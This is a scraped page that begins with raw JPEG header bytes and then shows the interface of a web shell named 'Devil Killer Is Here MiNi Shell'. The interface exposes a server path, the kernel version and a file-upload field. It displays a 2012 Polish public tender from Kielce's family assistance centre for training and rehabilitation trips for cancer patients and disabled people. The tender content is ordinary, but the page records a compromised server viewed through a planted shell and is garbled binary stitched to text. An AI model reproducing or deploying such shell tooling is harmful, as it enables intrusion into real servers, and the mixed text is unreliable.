JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120525/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120525/172228-N-2012.html

<p class="kh_header"><b>Kielce: Wyjazdowe szkolenia i warsztaty dla beneficjentów projektu Równi lecz różni</b><br>
<b>Numer ogłoszenia: 172228 - 2012; data zamieszczenia: 25.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , Al.   IX Wieków Kielc 3, 25-516 Kielce, woj. świętokrzyskie, tel. 041 342 15 97, faks 041 344 37 49.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcpr.powiat.kielce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wyjazdowe szkolenia i warsztaty dla beneficjentów projektu Równi lecz różni.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie wyjazdowych szkoleń i warsztatów dla beneficjentów  projektu systemowego Powiatowego Centrum Pomocy Rodzinie w Kielcach pn. Równi lecz różni, - realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII - Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie.

Szczegółowy opis przedmiotu zamówienia:
Zamawiający podzielił zamówienie na 4 zadania tj.:

Zadanie nr 1 
Zamówienie obejmuje: 
Przedmiotem zamówienia jest zorganizowanie dziesięciodniowych wyjazdowych warsztatów pn.: Jestem pełnowartościową kobietą połączonych z aktywizacją zdrowotną dla 11 kobiet po mastektomii lub z innymi chorobami nowotworowymi. 

1. Instrument aktywizacji edukacyjnej: 
a) szkolenie komputerowe w co najmniej  dwóch grupach, obejmujące tematykę podstawowych informacji związanych z poruszaniem się w sieci internetowej (korzystanie z usług internetowych, bezpieczna praca w systemie, najpopularniejsze portale internetowe, zakładanie i obsługa konta e-mail) w wymiarze min. 15 godzin lekcyjnych każda grupa.
Wykonawca zapewni:
- salę do przeprowadzenia kursu komputerowego z odpowiednim zapleczem technicznym wyposażoną w odpowiednią liczbę miejsc, stolików, dostosowaną do ilości osób szkolonych wraz z zapleczem sanitarnym, - na terenie ośrodka, w którym będą zakwaterowane uczestniczki, 
- komputery po jednym na każdą osobę szkoloną,
- pracę z uczestniczkami według ich potrzeb, 
- catering podczas zajęć (kawa, herbata, napoje, ciastka),  
- bezpłatne materiały szkoleniowe dla każdej uczestniczki szkolenia, które zostaną ujęte w koszcie szkolenia i po jego zakończeniu przejdą w posiadanie absolwentek ww szkolenia.
2. Instrument aktywizacji zdrowotnej:
a) zorganizowanie i przeprowadzenie 2 badań lekarskich:
- pierwsze celem wykluczenia przeciwwskazań  do zajęć rehabilitacyjnych na początku pobytu,
- drugie celem kontroli efektywności zajęć rehabilitacyjnych dla uczestniczek,
b) zajęcia rehabilitacyjne na basenie - 6 dni po 90 min dziennie:
- adaptacja do środowiska wodnego - oswojenie się ze środowiskiem wodnym;
- dobór ćwiczeń do indywidualnych problemów ruchowych;
- ćwiczenia w wodzie jako czynnik relaksacji i odciążenia ciała;
- wpływ na siłę mięśniową poprzez wykorzystanie warunków odciążenia i oporu jakie stwarza środowisko wodne;
- wpływ na zwiększenie wydolności krążeniowo- oddechowej;
- ćwiczenia rozciągające w wodzie jako czynnik likwidujący przykurcze;
Zajęcia rehabilitacyjne powinny być prowadzone przez osobę posiadającą odpowiednie kwalifikacje.
Zajęcia rehabilitacyjne mogą być zorganizowane i przeprowadzone na terenie ośrodka, w którym będzie odbywała się usługa lub na basenie poza ośrodkiem. W przypadku gdy zajęcia będą odbywały się poza ośrodkiem, wykonawca zapewni transport uczestniczek z ośrodka na basem i z powrotem.    
Na zajęciach oprócz osoby prowadzącej rehabilitację wykonawca zapewni ratownika. 
3. Instrument aktywizacji społecznej: 
a) warsztaty z psychologiem dotyczące akceptacji samego siebie, podnoszenia samooceny, zwiększenia poczucia własnej wartości - 10 godzin lekcyjnych,
b) spotkanie z wizażystą - 3 godziny zegarowe,
c) zajęcia taneczne, nauka układu tanecznego - 3 godziny zegarowe, 
d) zorganizowanie 2 wieczorków integracyjnych: 
- pierwszy obejmujący zapoznanie się uczestniczek wyjazdu z lokalną tradycją i kulturą (zorganizowanie ogniska, przyśpiewki, kuchnia regionalna itp.), 
- drugi - zabawa taneczna.
e) zorganizowanie jednodniowej wycieczki autokarowej - zwiedzanie okolicznych atrakcji turystycznych.
4. Usługa będzie odbywała się w górach na południu Polski.
5. Wykonawca zorganizuje transport zbiorowy dla uczestniczek wyjazdu z miejscowości Kielce do miejsca realizacji usługi oraz z powrotem.
6. Wykonawca zapewni kierownika grupy, który będzie prowadził stały nadzór nad grupą oraz będzie organizował czas wolny uczestniczkom wyjazdu.  Kierownik grupy zapewnia opiekę organizacyjną od momentu wyjazdu grupy z Kielc do momentu powrotu grupy do Kielc. 

Termin wyjazdu: 25.06.2012r - 20.07.2012r.   Wyjazd obejmuje 10 dni, w tym 9 noclegów. 

Zamawiający informuje, że do organizowanej usługi będzie stosował prawo opcji. Podane ilości osób są wielkościami, które Zamawiający maksymalnie skieruje na wyjazd. Zamawiający zakłada, że z przyczyn niezależnych od Zamawiającego ilość osób może ulec zmianie o 2 osoby.   

Zadanie nr 2 
Zamówienie obejmuje: 
Przedmiotem zamówienia jest zorganizowanie czternastodniowego wyjazdu integracyjnego połączonego z przeprowadzeniem warsztatów dla 25 osób niepełnosprawnych z upośledzeniem umysłowym oraz zapewnienie pobytu dla 5 opiekunów osób niepełnosprawnych. 

1. Instrument aktywizacji edukacyjnej: 
Wykonawca zorganizuje i przeprowadzi warsztaty z zakresu: 
a) kształtowania umiejętności manualnych Wykonanie drobnych elementów dekoracyjnych z rattanu dla 13 osób niepełnosprawnych, 
b) kształtowania umiejętności manualnych Wykonanie drobnych elementów dekoracyjnych ze skóry dla 12 osób niepełnosprawnych, 
c) zajęcia dla każdej z grup powinny odbywać się w wymiarze minimum 30 godzin lekcyjnych, 
zajęcia dla obu grup powinny odbywać się w tym samym czasie,  
d) zajęcia dla każdej grupy powinny odbywać się na terenie ośrodka, w którym będą zakwaterowani uczestnicy.
e) Wykonawca zapewni wszelkie materiały potrzebne do przeprowadzenia warsztatów oraz niezbędne narzędzia dla uczestników warsztatów. Wytworzone prace przez uczestników pozostają własnością uczestników. 
f) Wykonawca uwzględni możliwość biernego uczestnictwa w warsztatach opiekunów.
2. Instrument aktywizacji społecznej: 
Wykonawca zorganizuje dla uczestników  i opiekunów:
a) dwie całodzienne autokarowe wycieczki (tj. transport, bilety wstępu, opieka pilota, przewodnika),  
b) dwie piesze wycieczki krajoznawcze, 
c) przejażdżkę  bryczką lub wozami konnymi po okolicy, 
d) 2 wyjazdy na basen lub źródła termalne min. po 2 godz., 
e) 2 ogniska z przyśpiewkami i poczęstunkiem (grillowanie, kuchnia regionalna),
3. Wyjazd integracyjny połączony z przeprowadzeniem warsztatów zostanie zrealizowany na obszarze Polski na terenie gór: Tatr, Pienin, Beskidów, Gorc.  
4. Wykonawca zapewni transport uczestników i opiekunów na trasie Łagiewniki  - miejsce zakwaterowania w dniu rozpoczęcia i powrót z miejsca zakwaterowania do Łagiewnik w dniu zakończenia pobytu.
5. Wykonawca zapewni kierownika grupy, który będzie prowadził stały nadzór nad grupą oraz będzie organizował czas wolny uczestnikom wyjazdu.  Kierownik grupy zapewnia opiekę organizacyjną od momentu wyjazdu grupy z Łagiewnik do momentu powrotu grupy do Łagiewnik. 

Termin wyjazdu:  wrzesień  2012r.   Wyjazd obejmuje 14 dni, w tym 13 noclegów.

Zamawiający informuje, że do organizowanej usługi będzie stosował prawo opcji. Podane ilości osób są wielkościami, które Zamawiający maksymalnie skieruje na wyjazd. Zamawiający zakłada, że z przyczyn niezależnych od Zamawiającego ilość osób może ulec zmianie o 2 osoby.   

Zadanie nr 3 
Zamówienie obejmuje: 
Przedmiotem zamówienia jest zorganizowanie czternastodniowego wyjazdowego szkolenia komputerowego połączonego z aktywizacją zdrowotną dla 22 osób niepełnosprawnych - dysfunkcje zróżnicowane w tym osoby poruszające się o kulach.

1. Instrument aktywizacji edukacyjnej: 
a) szkolenie komputerowe w co najmniej dwóch grupach - Komputer od podstaw. Szkolenie powinno obejmować między innymi: podstawy obsługi komputera w systemie Windows, Edytor tekstu MS Word, Arkusz kalkulacyjny MS Excel, korzystanie z Internetu i poczty elektronicznej w wymiarze min. 30 godzin lekcyjnych każda grupa.
Wykonawca zapewni:
- salę do przeprowadzenia kursu komputerowego z odpowiednim zapleczem technicznym wyposażoną w odpowiednią liczbę miejsc, stolików, dostosowaną do ilości osób szkolonych wraz z zapleczem sanitarnym, - na terenie ośrodka, w którym będą zakwaterowani uczestnicy, 
- komputery po jednym na każdą osobę szkoloną,
- pracę z uczestnikami według ich potrzeb, 
- catering podczas zajęć (kawa, herbata, napoje, ciastka),  
- bezpłatne materiały szkoleniowe dla każdego uczestnika szkolenia, które zostaną ujęte w koszcie szkolenia i po jego zakończeniu przejdą w posiadanie absolwentów w/w szkolenia.
2. Instrument aktywizacji zdrowotnej:
- zorganizowanie i przeprowadzenie 2 badań lekarskich: pierwsze celem wskazania zabiegów rehabilitacyjnych na początku pobytu oraz drugie celem kontroli efektywności zabiegów rehabilitacyjnych,
- minimum trzy zabiegi rehabilitacyjne dziennie przez 9 dni pobytu dla uczestników, zgodne z indywidualnymi  zaleceniami lekarskimi,
3. Instrument aktywizacji społecznej: 
a)	zorganizowanie zajęć warsztatowych pn.: Radzenie sobie w trudnych sytuacjach życiowych - 3 godz. zegarowe, 
b)	zorganizowanie 2 wieczorków integracyjnych: 
-	pierwszy - wieczorek taneczny wraz z poczęstunkiem, 
-	drugi obejmujący zapoznanie się uczestników wyjazdu z lokalną tradycją i kulturą  - zorganizowanie ogniska, przyśpiewki, kuchnia regionalna itp., 
c)	zorganizowanie jednodniowej wycieczki autokarowej - zwiedzanie okolicznych atrakcji turystycznych,
d)	zorganizowanie wyjazdu na basen lub źródła termalne min. 2 godziny. 
4. Usługa będzie odbywała się w górach na południu Polski.
5. Wykonawca zorganizuje transport zbiorowy dla uczestników projektu z miejscowości Kielce do miejsca realizacji usługi oraz z powrotem.
6. Wykonawca zapewni kierownika grupy, który będzie prowadził stały nadzór nad grupą oraz będzie organizował czas wolny uczestnikom wyjazdu.  Kierownik grupy zapewnia opiekę organizacyjną od momentu wyjazdu grupy z Kielc do momentu powrotu grupy do Kielc. 

Termin wyjazdu:  lipiec 2012r.   Wyjazd obejmuje 14 dni, w tym 13 noclegów.

Zamawiający informuje, że do organizowanej usługi będzie stosował prawo opcji. Podane ilości osób są wielkościami, które Zamawiający maksymalnie skieruje na wyjazd. Zamawiający zakłada, że z przyczyn niezależnych od Zamawiającego ilość osób może ulec zmianie o 4 osoby.   

Zadanie nr 4 
Zamówienie obejmuje: 
Przedmiotem zamówienia jest zorganizowanie czternastodniowego wyjazdowego szkolenia komputerowego połączonego z aktywizacją zdrowotną dla 22 osób niepełnosprawnych  - dysfunkcje zróżnicowane.

1. Instrument aktywizacji edukacyjnej: 
a) szkolenie komputerowe w co najmniej dwóch grupach dla 19 osób niepełnosprawnych - Komputer od podstaw. Szkolenie powinno obejmować między innymi: podstawy obsługi komputera w systemie Windows, Edytor tekstu MS Word, Arkusz kalkulacyjny MS Excel, korzystanie z Internetu i poczty elektronicznej w wymiarze min. 30 godzin lekcyjnych każda grupa.
b) szkolenie komputerowe dla 3 osób niepełnosprawnych - Projektowanie stron internetowych w wymiarze min. 30 godzin lekcyjnych. Jedna osoba jest osobą niedowidzącą, Zamawiający wymaga aby Wykonawca zapewnił odpowiednie oprogramowanie umożliwiające pracę tej osoby na komputerze.  
Wykonawca zapewni:
- salę do przeprowadzenia kursu komputerowego z odpowiednim zapleczem technicznym wyposażoną w odpowiednią liczbę miejsc, stolików, dostosowaną do ilości osób szkolonych wraz z zapleczem sanitarnym - na terenie ośrodka, w którym będą zakwaterowani uczestnicy, 
- komputery po jednym na każdą osobę szkoloną,
- pracę z uczestnikami według ich potrzeb, 
- catering podczas zajęć (kawa, herbata, napoje, ciastka),  
- bezpłatne materiały szkoleniowe dla każdego uczestnika szkolenia, które zostaną ujęte w koszcie szkolenia i po jego zakończeniu przejdą w posiadanie absolwentów w/w szkolenia.
2. Instrument aktywizacji zdrowotnej:
- zorganizowanie i przeprowadzenie 2 badań lekarskich: pierwsze celem wskazania zabiegów rehabilitacyjnych na początku pobytu oraz drugie celem kontroli efektywności zabiegów rehabilitacyjnych,
- minimum trzy zabiegi rehabilitacyjne dziennie przez 9 dni pobytu dla uczestników, zgodne z indywidualnymi  zaleceniami lekarskimi,
3. Instrument aktywizacji społecznej: 
a)	zorganizowanie zajęć warsztatowych pn.: Skuteczna komunikacja - sztuka porozumiewania się - 3 godz. zegarowe, 
b)	zorganizowanie 2 wieczorków integracyjnych: 
-	pierwszy - wieczorek taneczny wraz z poczęstunkiem, 
-	drugi obejmujący zapoznanie się uczestników wyjazdu z lokalną tradycją i kulturą  - zorganizowanie ogniska, przyśpiewki, kuchnia regionalna itp., 
c)	zorganizowanie jednodniowej wycieczki autokarowej - zwiedzanie okolicznych atrakcji turystycznych,
d)	zorganizowanie wyjazdu na basen lub źródła termalne min. 2 godziny. 

4. Usługa będzie odbywała się w górach na południu Polski.
5. Wykonawca zorganizuje transport zbiorowy dla uczestników projektu z miejscowości Kielce do miejsca realizacji usługi oraz z powrotem.
6. Wykonawca zapewni kierownika grupy, który będzie prowadził stały nadzór nad grupą oraz będzie organizował czas wolny uczestnikom wyjazdu.  Kierownik grupy zapewnia opiekę organizacyjną od momentu wyjazdu grupy z Kielc do momentu powrotu grupy do Kielc. 

Termin wyjazdu:  sierpień  2012r.   Wyjazd obejmuje 14 dni, w tym 13 noclegów.

Zamawiający informuje, że do organizowanej usługi będzie stosował prawo opcji. Podane ilości osób są wielkościami, które Zamawiający maksymalnie skieruje na wyjazd. Zamawiający zakłada, że z przyczyn niezależnych od Zamawiającego ilość osób może ulec zmianie o 4 osoby.   

Warunki dodatkowe dotyczące zadań 1-4: 
1. Wykonawca ubezpieczy wszystkich uczestników wyjazdu od następstw nieszczęśliwych wypadków na kwotę 10 000 zł na jedną osobę w czasie całego pobytu oraz podczas przejazdu w obie strony.
2. Wykonawca zorganizuje zakwaterowanie dla uczestników w trakcie realizacji w/w usługi w ośrodku w pokojach dwuosobowych lub trzyosobowych o podwyższonym standardzie z pełnym węzłem sanitarnym (tj. WC, łazienka z prysznicem lub wanną, umywalką), z TV kablową i czajnikiem bezprzewodowym. Wykonawca w ośrodku zapewni salę konferencyjną gdzie będą odbywały się zajęcia.    
3. Wykonawca zapewni bezpłatny dostęp do obiektów rekreacyjno-sportowych, np.:  boisko sportowe, boisko do koszykówki, siatkówki oraz bezpłatny dostęp do sprzętu sportowego.  
4. Wykonawca zapewni: całodzienne wyżywienie składające się z trzech posiłków (śniadanie, obiad, kolacja),  catering  podczas zajęć (kawa, herbata, napoje, ciastka),  suchy prowiant podczas  wycieczek  oraz w drodze powrotnej. Zamawiający poinformuje Wykonawcę o rodzaju diety co najmniej trzy dni  wcześniej przed przyjazdem grupy do ośrodka.
5. Wykonawca poniesie koszty opłaty uzdrowiskowej/klimatycznej za wszystkich uczestników wyjazdu. 
6. Wykonawca zapewni bezpłatną całodobową opiekę medyczną stosownie do potrzeb uczestników wyjazdu oraz w razie potrzeby opłaci transport chorego uczestnika wyjazdu do szpitala lub placówki medycznej. 
7. Wykonawca w trakcie realizacji zamówienia dokona rezerwacji pokoju i zapewni wyżywienie nieodpłatnie na 3 doby dla 3 pracowników kontrolujących przebieg realizacji zamówienia. 
8. Wykonawca w trakcie realizacji zamówienia będzie prowadził kronikę w formie nagrań lub fotografii cyfrowej z wszystkich realizowanych zadań. 
9. Wykonawcę zobowiązuje się do: 
- informowania uczestników usługi o współfinansowaniu projektu ze środków Unii Europejskiej, 
- oznakowania miejsca odbywania się usługi oraz wszystkich materiałów związanych z przeprowadzeniem usługi w szczególności dokumentów dotyczących przebiegu realizacji zadania, materiałów szkoleniowych, wydawanych dyplomów, certyfikatów lub innych zaświadczeń zgodne z aktualnymi wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki poprzez umieszczenie odpowiednich logotypów wraz z informacją o współfinansowaniu. 

Zamawiający dopuszcza składanie ofert częściowych na poszczególne zadania..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 85.31.25.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dla Zadania 1, 
- zostanie spełniony, jeśli Wykonawca wykaże, że wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 wyjazdowe kursy komputerowe  dla minimum 10 osób każdy, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, wraz z załączeniem dokumentów poświadczających, że te usługi zostały wykonane należycie, 

dla Zadania 2 
- zostanie spełniony, jeśli Wykonawca wykaże, że wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 wyjazdowe warsztaty z zajęciami manualnymi  dla minimum 15 osób każdy, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, wraz z załączeniem dokumentów poświadczających, że te usługi zostały wykonane należycie, 

dla Zadania 3, 4, 
- zostanie spełniony, jeśli Wykonawca wykaże, że wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 wyjazdowe kursy komputerowe  dla minimum 15 osób każdy, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, wraz z załączeniem dokumentów poświadczających, że te usługi zostały wykonane należycie- wymóg ten dotyczy każdego z zadań  z osobna,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
